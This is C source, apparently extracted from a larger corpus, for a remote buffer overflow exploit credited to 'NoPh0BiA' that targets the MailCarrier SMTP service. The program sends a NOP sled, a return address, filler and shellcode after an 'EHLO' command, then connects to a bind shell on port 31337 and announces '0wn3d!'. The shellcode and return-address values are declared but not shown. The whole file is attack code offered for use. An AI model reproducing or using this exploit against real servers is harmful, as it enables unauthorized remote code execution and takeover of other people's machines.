
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int PORT ;
 char* RET ;
 int RPORT ;
 int close (int) ;
 int conn (char*,int ) ;
 int exit (int ) ;
 char* malloc (int) ;
 int memset (char*,int,int) ;
 int printf (char*) ;
 int shell (int) ;
 char* shellcode ;
 int sleep (int) ;
 int strcat (char*,char*) ;
 int write (int,char*,int) ;

int main(int argc, char *argv[])
{
 char *buffer = malloc(5530),*crap = malloc(32),*t;
 int x,y;
 if(argc<2)
 {
 printf("Usage: TargetIP.\n");
 exit(0);
 }
 printf("**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\n");
 t=argv[1];
 memset(buffer,'\0',5530);
 memset(crap,0x41,32);
 memset(buffer,0x90,5095);
 strcat(buffer,RET);
 strcat(buffer,crap);
 strcat(buffer,shellcode);
 x = conn(t,PORT);
 printf("[x] Sending evil buffer..");
 sleep(3);
 write(x,"EHLO ",5);
 sleep(1);
 write(x,buffer,5530);
 write(x,"\r\n\r\n",4);
 sleep(2);
 close(x);
 printf("done.\n");
 printf("[x] Trying to connect to port 31337..\n");
 y = conn(t,RPORT);
 printf("[x] 0wn3d!\n");
 printf("\r\n");
 shell(y);

}
